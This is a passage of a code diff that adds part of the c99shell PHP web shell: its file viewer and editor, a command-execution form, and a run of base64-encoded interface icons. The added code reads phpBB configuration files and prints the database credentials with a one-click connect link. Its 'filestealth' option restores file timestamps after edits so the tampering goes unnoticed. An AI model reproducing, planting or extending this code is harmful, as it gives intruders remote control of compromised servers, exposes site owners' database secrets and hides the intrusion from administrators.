+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
+   } 
+   $encoded = ""; 
+   if ($base64 == 1) 
+   { 
+    echo "<b>Base64 Encode</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+   } 
+   elseif($base64 == 2) 
+   { 
+    echo "<b>Base64 Encode + Chunk</b><br>"; 
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
+   } 
+   elseif($base64 == 3) 
+   { 
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); 
+   } 
+   elseif($base64 == 4) 
+   { 
+    $text = file_get_contents($d.$f); 
+    $encoded = base64_decode($text); 
+    echo "<b>Base64 Decode"; 
+    if (base64_encode($encoded) != $text) {echo " (failed)";} 
+    echo "</b><br>"; 
+   } 
+   if (!empty($encoded)) 
+   { 
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
+   } 
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
+<P>"; 
+  } 
+  elseif ($ft == "html") 
+  { 
+   if ($white) {@ob_clean();} 
+   echo $r; 
+   if ($white) {c99shexit();} 
+  } 
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
+  elseif ($ft == "phpsess") 
+  { 
+   echo "<pre>"; 
+   $v = explode("|",$r); 
+   echo $v[0]."<br>"; 
+   var_dump(unserialize($v[1])); 
+   echo "</pre>"; 
+  } 
+  elseif ($ft == "exe") 
+  { 
+   $ext = explode(".",$f); 
+   $c = count($ext)-1; 
+   $ext = $ext[$c]; 
+   $ext = strtolower($ext); 
+   $rft = ""; 
+   foreach($exeftypes as $k=>$v) 
+   { 
+    if (in_array($ext,$v)) {$rft = $k; break;} 
+   } 
+   $cmd = str_replace("%f%",$f,$rft); 
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
+  } 
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
+  elseif ($ft == "code") 
+  { 
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
+   { 
+    $arr = explode("\n",$r); 
+    if (count($arr == 18)) 
+    { 
+     include($d.$f); 
+     echo "<b>phpBB configuration is detected in this file!<br>"; 
+     if ($dbms == "mysql4") {$dbms = "mysql";} 
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
+     echo "Parameters for manual connect:<br>"; 
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
+     echo "</b><hr size=\"1\" noshade>"; 
+    } 
+   } 
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
+   if (!empty($white)) {@ob_clean();} 
+   highlight_file($d.$f); 
+   if (!empty($white)) {c99shexit();} 
+   echo "</div>"; 
+  } 
+  elseif ($ft == "download") 
+  { 
+   @ob_clean(); 
+   header("Content-type: application/octet-stream"); 
+   header("Content-length: ".filesize($d.$f)); 
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo $r; 
+   exit; 
+  } 
+  elseif ($ft == "notepad") 
+  { 
+   @ob_clean(); 
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit; 
+  } 
+  elseif ($ft == "img") 
+  { 
+   $inf = getimagesize($d.$f); 
+   if (!$white) 
+   { 
+    if (empty($imgsize)) {$imgsize = 20;} 
+    $width = $inf[0]/100*$imgsize; 
+    $height = $inf[1]/100*$imgsize; 
+    echo "<center><b>Size:</b>&nbsp;"; 
+    $sizes = array("100","50","20"); 
+    foreach ($sizes as $v) 
+    { 
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
+     if ($imgsize != $v ) {echo $v;} 
+     else {echo "<u>".$v."</u>";} 
+     echo "</a>&nbsp;&nbsp;&nbsp;"; 
+    } 
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
+   } 
+   else 
+   { 
+    @ob_clean(); 
+    $ext = explode($f,"."); 
+    $ext = $ext[count($ext)-1]; 
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f); 
+    exit; 
+   } 
+  } 
+  elseif ($ft == "edit") 
+  { 
+   if (!empty($submit)) 
+   { 
+    if ($filestealth) {$stat = stat($d.$f);} 
+    $fp = fopen($d.$f,"w"); 
+    if (!$fp) {echo "<b>Can't write to file!</b>";} 
+    else 
+    { 
+     echo "<b>Saved!</b>"; 
+     fwrite($fp,$edit_text); 
+     fclose($fp); 
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
+     $r = $edit_text; 
+    } 
+   } 
+   $rows = count(explode("\r\n",$r)); 
+   if ($rows < 10) {$rows = 10;} 
+   if ($rows > 30) {$rows = 30;} 
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
+  } 
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
+ } 
+} 
+} 
+else 
+{ 
+ @ob_clean(); 
+ $images = array( 
+"arrow_ltr"=> 
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
+"back"=> 
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
+"Wg0JADs=", 
+"buffer"=> 
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
+"change"=> 
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
+"zMshADs=", 
+"delete"=> 
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
+"download"=> 
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
+"forward"=> 
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
+"WqsJADs=", 
+"home"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
+"mode"=> 
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
+"refresh"=> 
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
+"search"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
+"setup"=> 
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
+"small_dir"=> 
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
+"small_unk"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". 
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". 
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". 
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". 
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". 
+"yAsokBkQADs=", 
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". 
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", 
+"sort_asc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", 
+"sort_desc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". 
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", 
+"sql_button_drop"=> 
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". 
+"AQEAOw==", 
+"sql_button_empty"=> 
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". 
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", 
+"sql_button_insert"=> 
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", 
+"up"=> 
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". 
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", 
+"write"=> 
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". 
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", 
+"ext_asp"=> 
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". 
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". 
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", 
+"ext_mp3"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
+"ext_avi"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". 
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". 
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7", 
+"ext_cgi"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". 
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". 
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". 
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
